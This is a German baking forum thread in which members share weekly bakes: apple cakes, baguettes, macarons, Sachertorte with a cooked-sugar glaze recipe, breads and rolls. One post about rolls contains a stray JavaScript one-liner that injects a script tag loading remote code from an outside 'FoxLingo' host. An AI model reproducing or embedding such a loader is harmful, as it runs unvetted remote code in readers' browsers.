Backwoche vom 9.9. -15.9.2012

141 Beiträge / 0 neu
Letzter Beitrag
Backwoche vom 9.9. -15.9.2012

Ein herzliches Willkommen auch von mir in unserer neuen Backstube.

Und ein herzliches Dankeschön an Bernd und Hajo, die uns diese schöne Möglichkeit des Austausches von Ideen und Rezepten geschaffen haben.
Aber jetzt soll es losgehen und wir freuen uns , wenn ihr uns eure Gebäcke hier vorstellt.  Ganz viel Erfolg und Backspaß wünsche ich euch dabei.

Wer nichts versucht, dem erscheint alles unmöglich.

Backwoche vom 9.9. -15.9.2012

Es wurden gebacken....
Ein Apfelkuchen mit Streusel und ein Apfel- Pudding Streuselkuchen wink

LG Gazipasa

Gazipasa wrote:
Gazipasa wrote:

Es wurden gebacken....
Ein Apfelkuchen mit Streusel und ein Apfel- Pudding Streuselkuchen wink

 
und schon das erste Backergbenis - prima Heidi cheeky

Viele Grüße Bernd
Ein Lächeln kostet nichts, aber es ist viel wert
www.konditoreirezepte.de
www.backmichel.de
www.weihnachts-gebäck.de

 
 

 

Für Apfelkuchen mit Streuseln

Für Apfelkuchen mit Streuseln könnte ich ja glatt das Vaterland verraten. Dein Kuchen sieht sehr lecker aus Heidi.

Wer nichts versucht, dem erscheint alles unmöglich.

Ich bin zwar nicht von der

Ich bin zwar nicht von der süssen Fraktion, aber deine Kuchen sehen zum anbeissen aus Heidi.

Hälsningar oimelchen
_________________________________________

Fleisch für Brüder - Brot und Gemüse für mich

Meine HP www.fjaril-konst-och-hantverk.se

sehr schoene Blumen Brigitte!

sehr schoene Blumen Brigitte!
 
Heide, so ein Stueckerl Kuchen koennte ich am Nachmittag zu meinem Kaffee gut gebrauchen.
Sieht sehr gut aus!!
 
Nicole

Bei mir gibt es heute

Bei mir gibt es heute Rugelach zum Naschen.
Die Teile sind leider genauso teuflisch, wie gebrannte Mandeln. Ich kann erst aufhören, sie in mich rein zu stopfen, wenn mir so richtig übel ist.
In der Küche stehen noch drei Kastenbrote aus Roggenmehl, Weizen- und Buchweizenmehl. Die müßten gleich in den Ofen können.
Schönen Sonntag, Euch allen.

Viele Grüße

Kalorie

Brötchen mit mediterranem WM T 550

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
Hallo,
heute war wieder Backtag.
Bereits am Donnerstag hatte ich das mediterrane 550er Mehl zum erstenmal verbacken. Die Brötchen fand ich nun nicht so gut gelungen.
Deshalb gab es heute eine Wiederholung, jedoch mit kleinen Veränderungen.
Zunächst einmal habe ich das Gewicht der Teiglinge halbiert, vorher 140 Gramm, heute 75 Gramm.
Dann hatte ich heute einen kleinenTopf mit kochendem Wasser in den Backofen gestellt. Der fehlte am Donnerstag.
Waren die Brötchen am Donnerstag noch sehr hell so sind sie heute fast schon zu dunkel. Heute habe ich mit Backmalz und Lecetin gearbeitet.
Einen Anschnitt werde ich wohl erstmal nicht zeigen können, die Brötchen sind für die Familienfrühstücke in der kommenden Woche gedacht und werden eingefroren.
In meinem Picasaalbum könnt ihr beide Brötchen sehen und vergleichen.
 



Ich stelle gerade fest, dass es sehr mühsam ist wenn man Fotos einfügen möchte. Trotz der Anleitung von Hajo.
Auch vermisse ich die Möglichkeit der Vorschau. Wo finde ich die bitte?
 
Grüße aus Ostfriesland
Andreas

 

Die Vorschau funktioniert

Die Vorschau funktioniert leider noch nicht richtig, Andreas. Hajo ist an dem Problem mit Sicherheit schon dran.
Das Foto hochladen hat mir auch Probleme bereitet, aber inzwischen habe ich es kapiert und es ist eigentlich ganz einfach. Ich habe mir Hajos Anleitung ausgedruckt und bin  Schritt für Schritt danach vorgegangen. Und schon hat es geklappt.
 
@Kalorie
Rugelach??? Kann man das auch selber machen? Für süße Naschereien bin ich (und nochmehr mein allerliebster Göga) immer zu haben.
Damit es hier nicht so bierernst zugeht, habe ich gleich mal ein bisschen Murks beizusteuern. Naja, Murks ist vielleicht ein bisschen übertrieben, aber ich hätte mir schöne, aufgerissene Baguettes gewünscht. Getestet hatte ich eine sehr lange Führung (wie bei dem Pain pailasse), die verwendeten Mehle waren nur Weizenmehl und ein kleines bisschen Roggenmehl. Der Geschmack ist klasse. Die TA werde ich beim nächsten Versuch (ich hatte TA 172) noch ein bisschen absenken, denn mein Teig war zwar wunderbar blasig gegart, aber extrem klebrig und schwer zu bearbeiten. Ich habe also noch zu tun....

 
 

Wer nichts versucht, dem erscheint alles unmöglich.

Die Baguettes sind doch

Die Baguettes sind doch wirklich schön geworden Brigitte!!

Hälsningar oimelchen
_________________________________________

Fleisch für Brüder - Brot und Gemüse für mich

Meine HP www.fjaril-konst-och-hantverk.se

Naja, ich hatte sie mir

Naja, ich hatte sie mir anders vorgestellt. Sie werden uns heute abend trotzdem gut schmecken.smiley

Wer nichts versucht, dem erscheint alles unmöglich.

Ich stelle euch mal etwas

Ich stelle euch mal etwas Süßes zum Sonntagskaffee hin. Zum ersten Mal hatte ich die Macarons mit italienischem Baiser gemacht. Im Biss sind sie wunderbar zart, aber mir scheint, die kalt gerührten Macarons ziehen ein wenig besser hoch. Bernd, woran liegt es denn, wenn die Füßchen schief werden? Gefüllt hatte ich mit Erdbeermouse, Nougat- und Edelbitterganache.

 

Wer nichts versucht, dem erscheint alles unmöglich.

etwas zu heiss gebacken würde

etwas zu heiss gebacken und die Masse evtl. etwas zu intensiv bearbeitet würde ich sagen, könnte aber auch am Aufdressieren liegen - nicht 100 % mittig dressiert, wobei ich die gelungen finde! Das leichte seitliche Auftreiben kann man vernachlässigen laugh

Viele Grüße Bernd
Ein Lächeln kostet nichts, aber es ist viel wert
www.konditoreirezepte.de
www.backmichel.de
www.weihnachts-gebäck.de

 
 

 

heute gebacken

bei uns gibt es heute eine biskuittorte. meine tochter hat die schmetterlinge gemacht - mit etwas Hilfe
der hupf ist vor ein paar tagen schon entstanden
 

 
 

sehr schön Nicole, bei uns

sehr schön Nicole, bei uns gab es heute nix blush

Viele Grüße Bernd
Ein Lächeln kostet nichts, aber es ist viel wert
www.konditoreirezepte.de
www.backmichel.de
www.weihnachts-gebäck.de

 
 

 

Hallöchen,

Hallöchen,
heute habe ich ein Softkornbrot nach einem Rezept aus dem Buch "Brotland Deutschland" Bd. 1 von Franz J. Steffen gebacken. Es ist ein sehr leckeres Brot mit Roggenschrotanteil.

Herzlichst Ute

Ein Stück Brot in der Tasche ist besser als eine Feder auf dem Hut.
(Deutsches Sprichwort)

das Buch ist super, Dein Brot

das Buch ist super, Dein Brot auch Ute - leider bekommt man das Buch nicht mehr 

Viele Grüße Bernd
Ein Lächeln kostet nichts, aber es ist viel wert
www.konditoreirezepte.de
www.backmichel.de
www.weihnachts-gebäck.de

 
 

 

Wie ich schon sagte Ute, ein

Wie ich schon sagte Ute, ein Bilderbuchbrot!

Wer nichts versucht, dem erscheint alles unmöglich.

nur irgendwie sind mir die

nur irgendwie sind mir die Bilder zu klein geraten. Da muss ich noch das richtige Format suchen.

Herzlichst Ute

Ein Stück Brot in der Tasche ist besser als eine Feder auf dem Hut.
(Deutsches Sprichwort)

Ute, in den FAQ hat Hajo

Ute, in den FAQ hat Hajo erklärt, wie das Bildereinstellen geht. Wenn du Hajos Anleitungen Schritt für Schritt folgst, dann klappt das schon gut.

Wer nichts versucht, dem erscheint alles unmöglich.

Foccacia

Hallo zusammen 
Ich habe heute ein leckeres Foccacia Brot gebacken und mit Salz,verschiedenen Saaten veredelt.
Leider kann ich das Bild nicht hoch Laden gehn.
Weil ich mit IOS surfe und das hier leider nicht funktioniert LBG.Brigitte

Ich sehe aber ein Bild

Ich sehe aber ein Bild Brigitte und zwar eine leckere Foccacia.

Wer nichts versucht, dem erscheint alles unmöglich.

das war ich Brigitte 

das war ich Brigitte wink

Viele Grüße Bernd
Ein Lächeln kostet nichts, aber es ist viel wert
www.konditoreirezepte.de
www.backmichel.de
www.weihnachts-gebäck.de

 
 

 

Wow :-))

Das sieht ja alles super aus
 
@ Brigitte: die Baguettes - super. Eigenes Rezept? Und die Macarons - yammi ;-) Muss ich irgendwann auch mal versuchen, aber bei meiner Ungeduld....
@ Blackhorse: tolle Kuchen
@ Ute: zu Deinen tollen Broten kann man nix mehr sagen ;-) SUPER
 
Hab gestern auch gebacken: ein Saatenbrot mit Weizensauerteig und einem Hefewasservorteig - wollte wissen, ob das wirklich klappt mit diesen Wildhefen und ich muss sagen - WAHNSINN ... 
Und dann gab es noch ne Challah nach Plötzblog - mensch das wurde en Oschi - RIESIG da wäre ne Kompanie von satt geworden, aber erst einmal hat sich meine bessere Hälfte drüber hergemacht und um zu verhindern, dass er den ganzen Zopf platt macht ;-), wanderte ein Teil in den Froster. Fotos könnt ihr bald in meinem Heimtforum im Brotbackforum sichten.
Ansonsten wünschen ich allen erst einmal einen guten Start in eine neue Woche :-)

Herzlichst
Nadja

... ach es ist ja wie "früher

... ach es ist ja wie "früher" hier. nur schöner geordnet und klarer alles :)
Jedenfalls: Wunderbare Brote und Focaccia und schöne Kuchen und Brigitte, deine Macarons... ja das Rezept werd ich auch probieren, aber eher im Winter, im Moment reizt mich noch das ganze schöne Obst...
 
Daher gab's bei uns zum Wochenende auch einen ganz simplen "Quetschekuche" - Hefeteig nur mit etwas Butter und ohne Ei, dann die "Quetsche" und nur wenig Vanillezucker und Zimt drüber, bei 175° angebachen und dann noch bei 200° fertig gebacken, damit der Saft schön karamielisiert... ein Gedicht!
 
Schöne Woche für alle, liebe Grüsse
G:

 
 
Gott, die bilder werden aber winzig :(

Es wäre ja auch gefrevelt, 

Es wäre ja auch gefrevelt,  die Saison ohne Quetschekoche vergehen zu lassen. Dein Kuchen sieht richtig schön saftig aus . Gerhard in den FAQ steht eine Anleitung von Hajo, wie die Bilder hochgeladen werden können. Du kannst dann ein kleines Vorschaubild hochladen und den Link für ein großes Bild dazu. Durch Anklicken des kleinen Bildes ist dann das große sichtbar.

Wer nichts versucht, dem erscheint alles unmöglich.

Liebe Backfreunde!

Liebe Backfreunde!
 
Bin erstmal froh, daß  wieder mit Euch in Kontakt treten kann.
Ihr habe ja jede Menge schöne Sachen gebacken.
Morgen ist wieder Frauencafe:
es gibt a.) Sachertorte
und b.) hoffentlich auch Bienenstich.
 
Sachertorte ist bei mir traditionsgemäß bucklig wie der Glöckner von Notre Dame, habe sie umgedreht und die
Ausbuchtung hat sich wieder zurückgebildet.
Hat jemand von Euch schon einmal diese Original Sacherglasur gemacht, wo man Zuckerlösung kocht und dann
die Schokolade reintut und dann auch noch das ganze tabliert?
Habe das vor dem Sommer mal probiert, ist aber nichts geworden.
Irgendwie erscheint mir das ja schleierhaft, die Schokolade mitzukochen, wo es immer heißt, daß
man bei Schokolade extra aufpassen muß, weil es gleich einmal zu heiß wird.
Kuvertüre habe ich hier auch keine, es gibt nur so fettartige Nachahmungen.
Habe von Ö. aber wenigstens noch Kochschokolade da.
 
Ansonsten freue ich mich, daß alle wieder da sind.
Ohne Forum bin ich hier nämlich aufgeschmissen.
 
LG
die Brigitta
 

Bake your day!

@ Naddi

@ Naddi
Du hast ja eine Menge gebacken. Nachher komme ich mal rüber und schaue mir die Gebäcke an.
@ Brigitta
Ich habe diese Sacherglasur einmal gemacht. Sie ist auch gut geworden und hat uns geschmeckt, aber inzwischen mache ich lieber eine Ganache über die Sacher. Damit ist man auf der sicheren Seite.

Wer nichts versucht, dem erscheint alles unmöglich.

@ Pumpernickel

Ja das mit der Schokolade mitkochen finde ich auch immer sehr eigenartig, die gerinnt doch dann. Ich mache es deshalb meist so, dass ich die zu erhitzende Masse etwas abkühlen lasse und dann die grob gebrochene Schokolade daran schmelze, das klappt ganz gut.

Herzlichst
Nadja

Kekse von Heute

Für den Montagkaffe, habe ich schnell ein paar Lavakekse gebaken.
Das Rezept habe ich von meiner Freundin Guðni.
 

 
 

Der Apfel fällt nicht weit vom Kuchen

@Brigitte: ich werde auch

@Brigitte: ich werde auch eine Ganache machen.
Bin wie der Fuchs, dem die Trauben zu sauer sind bzw. in meinem Fall:
die gekochte Sacherglasur ist ja eh viel zu süß, weil da jede Menge Zucker mitrein muß.smiley
 
LG
Brigitta

Bake your day!

@ Naddi:

@ Naddi:
 
dh. Du kochst eine Zuckerlösung und tust dann die Schokolade rein?
Tablierst Du die Glasur noch?
Wenn das funktioniert, ja dann probiere ich es auch wieder.
Ich hatte halt beim Erstversuch eine halbgestockte Masse, die anzog
wie Gips, tablieren konnte man da gar nichts mehr.
 
LG
Brigitta

Bake your day!

@ Epona

@ Epona
Lavakekse? Das habe ich noch nie gehört. Die Keke sehen lecker aus. Gibt es ein Rezept dazu?

Wer nichts versucht, dem erscheint alles unmöglich.

Brigitte, danke nochmals für

Brigitte, danke nochmals für den hinweis - habs geschafft mit dem Link, bin ganz stolz :-D
Ja, jetzt kannst sehen: ist wirklich schön saftig. Das Rest-Stück gibts gleich...

Pumpernickel wrote:
Pumpernickel wrote:

@ Naddi:
 
dh. Du kochst eine Zuckerlösung und tust dann die Schokolade rein?
Tablierst Du die Glasur noch?
Wenn das funktioniert, ja dann probiere ich es auch wieder.
Ich hatte halt beim Erstversuch eine halbgestockte Masse, die anzog
wie Gips, tablieren konnte man da gar nichts mehr.
 
LG
Brigitta

Äh ne: also ich bezog das generell auf Sachen, wo man Schokolade zufügt. An Sachertorte hab ich mich noch nicht versucht, nur an Pralinen und da ist mir eben schon mal die Schokolade zu heiß geworden und wurde grisselig. 

Herzlichst
Nadja

Was der HH kann, will ich

Was der HH kann, will ich auch können, finde aber nicht einmal
das Bildsymbol, das ich ancliquen soll.
Ich will Euch nämlich nicht das Bild von meinem Bienenstich vorenthalten.
Externe Server wie Picasa oder Image shack gehen hier nicht - ich möchte es daher
mit dem Forums-Server versuchen.
Also, das da oben ist tatsächlich mein Bienenstich!
Gefüllt muß er noch werden.
Ich werde mir die Anleitung zum Bilder raufladen ausdrucken, he he, da habe ich sie bei der Hand
und muß nicht zwischen den Fenstern hin und herhüpfen.
Gut, daß der Bernd eingangs versichert hat, daß man selbst bei noch so großer
technischer Talentfreiheit hier im Forum nix hin machen kann.
LG
die Brigitta
 
 
 

Bake your day!

Brigiita,

Brigitta,
ich mache meine Sacher immer mit der gekochten Zuckerglasur.
Funktioniert einwandfrei und schmeckt uns gut.
 
nach dieser Anleitung vom thea forum mache ich diese glasur schon seit ein paar Jahren:
 

Glasur
200g Kristallzucker, 150g sehr gut Schokolade
(entweder Suchard Velma oder Lindt die 70%ige)

Glasur hertellen:
125 ml Wasser mit Kristallzucker bei satrker Hitze ca. 5 Minuten
(ich schaue da immer genau auf die Uhr damit es nicht zu lange kocht,
sonst klappt es nicht) kochen und abkühlen lassen. Schokolade schmelzen
und mit dem warmen Zuckerwasser nach und nach verrühren. Die Glasur vor
dem Auftragen auf Körpertemperatur abkühlen lassen, dabei immer wieder umrühren.
Die glasur soll eine Konsistenz haben, daß sie noch rinnt, aber nicht davon rinnt

also ich teste es immer ob ein Essloeffel gut ueberzogen ist mit glasur nach dem eintauchen
in die glasur. rinnt es zu schnell ab noch etwas warten.

Torte am Besten gleich auf die Tortenplatte stellen bevor man sie glasiert.
Macht man es umgekehrt, wird die schöne Glasur brechen.
 
so sieht sie dann aus:

Wow Nicole, in der Glasur

Wow Nicole, in der Glasur kann man sich ja spiegeln. Das Rezept muss ich mir gleich mal ausdrucken. Das kenne ich so nämlich noch gar nicht.

Wer nichts versucht, dem erscheint alles unmöglich.

@Nicole:

@Nicole:
Deine Glasur glänzt, daß man sich drin spiegeln kann.
Ich habe sie auch gemacht und es ist gut gegangen.
Bienenstich ist auch fertig geworden.
LG
Brigitta

Bake your day!

Hallo,

Hallo,
 
hier ist ja schon richtig gearbeitet worden!
 
Brigitte,
mir gefallen deine Baguettes optisch sehr, mich würde noch interessieren wie die Krume ist, ich habe in Erinnerung, dass die bei so langer Führung ein bischen "zäh" im Biss ist.
Die Macarons finde ich absolut gelungen cheeky,  ich würde sie  auch gern öfter machen, aber da mir nur meine Tochter beim vernaschen hilft und die nun mal nicht in Reichweite ist, bleibt dieses backen  wohl bei den besonderen Gelegenheiten. ;-)
 
Brigitta,
juhuu, da bist du ja wieder, ich freue mich sehr!
Wow du warst ja fleißig, Sacher und Bienenstich, dass ist schon ordentlich und der Stich sieht schon mal sehr gut aus.
 
Ute, 
wie immer, dein Brot ist, wie immer Klasse!
 
Heidi,
dein Apfelkuchen sieht lecker aus!
 
Andreas,
du warst ja fleißig.
Hast du ausschlieslich med. Mehl verwendet für deine Brötchen? 
Die 2. Ladung, die kleinen runden, hast du die eingeschnitten? Schade, dass die nicht aufgesprungen sind. 
Bist du mit dem Ergebnis zufrieden?
 
Nicole,
beide Kuchen sehen super gelungen aus!
Steigt Holly schon mit ein, die Schmetterlinge jedenfalls sind vielversprechend :-).
Ist über der Biskuittorte ein Bezug (unter den Schmetterlingen, ich kann das nicht recht erkennen.
Jedenfalls schmeckt mir  die Kombi Biskuit mit Puddingcreme immer super :-).
 
Brigitte J.
Foccacia, na das ist auch mal eine gute Idee- sieht guut aus.
 
Gerhard,
ich verstehe zwar den Teil mit der Quetsche nicht, dass macht aber nix,  denn dein Kuchen spricht für sich :-) -> lecker!
 
Epona,
was auch immer "Lavakekse" sind, deinem Foto nach zu urteilen, würde ich sie keinesfalls ablehnen ;-).
 
viele Grüße
Anett
 

(Kein Betreff)

muffin wrote:
muffin wrote:

Andreas,
du warst ja fleißig.
Hast du ausschlieslich med. Mehl verwendet für deine Brötchen? 
Die 2. Ladung, die kleinen runden, hast du die eingeschnitten? Schade, dass die nicht aufgesprungen sind. 
Bist du mit dem Ergebnis zufrieden?

Halo Anett,
ja, diese wurden nur mit dem mediterranen Mehl hergestellt. Ich wollte den Unterschied zu meinem üblichen T 550 von der hiesigen Mühle kennen lernen.
Bei diesen Brötchen hatte ich den Versuch gemacht sie mit der Schere einzuschneiden. Leider war das nicht sehr erfolgreich.
Richtig zufrieden bin ich mit derkleinen Variante nicht. Sie sind deutlich stärker gebacken als die größeren, waren auch sieben Minuten länger im Ofen. Meiner Frau gefällt das besser, mir nicht denn die Brötchen werden bei uns eingefroren und aufgebacken und dann sind sie mir zu hart.
Ich denke, dass ich künftig nur 20 Minuten backen werde. Die Brötchen für meine Frau werden dann eben etwas länger aufgebacken als meine.
 
Für morgen habe ich eben die Vorteige angesetzt.
Morgen will ich Resteverwertung machen. Ich hatte noch Dinkelvollkorn und einen Rest Typ 700. Dazu habe ich noch etwas Roggenschrot genommen. Was fehlt wird mit WM 550 aufgefüllt. Bin mal gespannt was dabei heraus kommt...
 
Hast Du den Fleischwolf schon? Und bist Du zufrieden?
 
Gruß
Andreas
 
 
 
 
 
 
 
 
 

Es freut mich auch zu sehen,

Es freut mich auch zu sehen, daß alle wieder mit dabei sind.
Heute geht es ins Frauencafe, bewaffnet mit Torte und Kuchen.
Sogar einen Sahnespender habe ich mit, habe ihn extra aus Ö. mitangeschleppt -
die Hausfrauenvariante allerdings.
Was sehe ich beim ersten Spaziergang durch den Basar,
wo sich auch mein Backgeschäft befindet?
Sie haben den großen, verchromten ISi-Prof. in der Auslage stehen.
Noch habe ich mich nicht getraut zu fragen, was der hier kostet -
aber Weihnachten kommt ja auch wieder!
 
Die in Ö. besorgten Gaskapseln mußte ich daheim lassen, dürfen nicht ins Flugzeug.
Ich habe die Original-Kapseln mittlerweile hier besorgen können
Einen Kirschenentkerner hatte ich auch im Gepäck, zusammen mit:
Weinsteinbackpulver, Aranzini, ein paar neuen Ausstechern, Lochtülle nr. 10 (endlich),
sogar ein Stück weisser Kuvertüre ist mitangereist.
Aber dann war leider Schluß, mehr ging in den Koffer nicht rein.
 
LG
die Brigitta

Bake your day!

@muffin

@muffin
Anett, die Krume der Baguettes war gar nicht zäh, aber der Teig war sehr klebrig. Ich werde diese Variante noch einmal mit niedrigerer TA ausprobieren.
Quetsche nennen wir in der Rhön und (wie ich sehe) auch in Mainz die Zwetschgen.smiley
Ich habe die letzten Macarons nach dem Füllen eingefroren. Bei der Tortentante hatte ich gelesen, dass das gut funktioniert.So nehme ich immer ein paar aus der Kühltruhe, wenn das kleine Hüngerchen kommt.
 

Wer nichts versucht, dem erscheint alles unmöglich.

@ Brigitte

Hallo und guten Morgen Brigitte,
 
wo fnde ich denn Dein Baguette Rezept? Denn ich finde Dein Wurzelbrot nach Pain Pailasse Art, das ja fast zwei Tage braucht, schon sensationell :-) 

Herzlichst
Nadja

Hallo!

Hallo!
Toscas Softkornbrot habe ich gestern gleich gebacken, und ich kann sagen, es lohnt sich wirklich:
Das mit dem Foto bekomme ich noch nicht hin. image shack und picr funzen hier nicht.

FBG Maja

 

Backen macht Freude

Nein Maja, imageshack geht

Nein Maja, imageshack geht hier nicht, soviel ich weiß. Lies dir doch mal die Anleitungen Hajos zum Bildereinstellen in den FAQ durch, dann klappt das auch. Mein Baguetterezept ist noch nicht soweit, dass ich es einstellen kann. Muss noch ein bisschen daran feilen, weil ich noch nicht so 100% zufrieden bin.

Wer nichts versucht, dem erscheint alles unmöglich.

Hallo!Frisch aus dem Ofen:

Hallo!
Frisch aus dem Ofen. Ein Stuten.

FBG Maja

Backen macht Freude

Dein Stuten sieht super aus,

Dein Stuten sieht super aus, Maja!yes

Wer nichts versucht, dem erscheint alles unmöglich.

Freut mich Brigitta!

Freut mich Brigitta!
maja - sehr schoen deine Brote 
Marla - der stuten ist auch toll!!
 
muffin, nein fuer Bezug war keine zeit, einfach nur in Buttercreme eingestrichen :-)
Ich habe heute Brot gebacken. Ein rustikales vollkornbrot mit Honig und sonnenblumenkernen

@ Blackhorse

Das sieht aber klasse aus, gar nicht so vollkornig cool

Herzlichst
Nadja

Seiten